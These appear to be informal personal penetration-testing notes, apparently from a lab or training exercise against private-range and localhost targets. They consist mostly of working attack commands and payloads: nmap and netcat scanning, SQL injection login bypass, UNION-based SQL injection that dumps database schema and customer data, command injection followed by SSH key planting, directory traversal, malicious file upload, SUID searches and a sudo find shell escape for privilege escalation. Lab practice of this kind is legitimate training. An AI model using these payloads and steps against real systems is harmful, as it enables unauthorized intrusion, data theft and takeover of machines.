immediate interesting commands

WHEN SCP SPECIFY PORT WITH -P
we have to fix NETCAT? follow the net cat path and chmod the endfile



10.50.29.198
DYWA-002-M





Linux Exploit
Zeus accounts?
make SURE THAT when using john that the account hash 
been perfectly copied over to a textfile.
sudo -l 
grep 'extra\|value' sample.txt

 windows exploit
   where /r c:\windows ntoskrnl.exe
   everytime i scp a new file i have to RESTART MACHINE
   

----------------------------------------------------------------------------------
 

nmap -Pn -T4 (-n) --min-rate 8888888888888 10.50.29.198 -p 80,8080,22,2222,4444,9999,21,3389,1-1024
paste results in notes

nc 10.50.29.198 22
SSH SSH  - add this banner to the nmap scan notes

nc 10.50.29.198 80
!DOCTYPE HTML PUBLIC

it might hang
type a letter and press enter

3389 is always RDP


PORT INTEROGATIOn 
nmap -Pn -T4 (-n) --min-rate 8888888888888 10.50.29.198 -p 80 --script http-enum.nse
nmap --script http-enum 
/login
/script

if i use nikto proxychains redirect to 2>/dev/null
nikto -h ip 
might not work


firefox to website
login page ' or 1='1 (check spaces) for username passwd 

another method
dev console got to the post request
goto response  and convert it to raw
copy entire thing and add a question mark to url and paste
login.php?username='+or+1%3D'1+&passwd='+or+1%3D'1+

only encode is rot13 /base64 

cmd injection if ; whoami doesnt work then it dont work
if it does work upload ssh key immediately

``````
directory traversal

../ * 6

-------------
malicious file upload
most likely .php maybe .py
i have to able to find where its uploading to

----------------------------
ON BOX
enumerate /etc/hosts  .. .. ..
privilege escalation

find -perm /4000 and /2000 last effort /6000
if nun
check for gdb
if nun 
check crontab, sys dirs 
if nun i cant escalate

look at network maps, ip a , you can ping the name of ip in hetc host

--------------------------------------
setup proxychains and scan next tgt using script (i can redirect nmap 2>/dev/null)
check if ssh creds work
-------------------


PRODUCT SELECTION

look for tables and colmuns
test product=1 OR 1=1; #
for all of them
http://localhost:11900/pick.php?product=7%20OR%201=1;%20#
THEN
product=7 UNION SELECT 1,2,3;#
product=7 UNION SELECT table_schema,column_name,table_name FROM information_schema.columns; #
                                  column = 1,3,2
NORMAL would be tableschema,table_name,column_name                                  
                                
PULLING DATA FROM DATABASE

siteusers  |   customer  |  account
siteusers  |   customer  |  name


product=7 UNION SELECT name,description,account FROM siteusers.customer;
============================================================================

BANNER GRABBING KEY STEPPPPPPPPPPPPPPPPPPPPPp
no creds work just network------------
make sure to ping sweep just ping sweep that IP as /24 /18
for i in {97..126} ;do (nc -zv 192.168.28.$i 21-23) ;done PORT SCANNING
for i in {1..254} ;do (ping -c 1 192.168.28.$i/27 | grep "bytes from" &) ;done

adjust tunnels if needed.


Nmap scan report for 192.168.28.172
Host is up (0.0016s latency).
Not shown: 9999 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
7008/tcp open  afs3-update


banner grabbed 7008 nothing returned

only way to get in is ssh (credential reuse)
-> on box

--------------------------------------
if i run which command and it knows = good
else navigate to directory and specify the command
if doesnt know where 

/usr/bin/find
sudo find . -exec /bin/sh \; -quit

else 
sudo /path/./command . -exec /bin/sh \; -quit
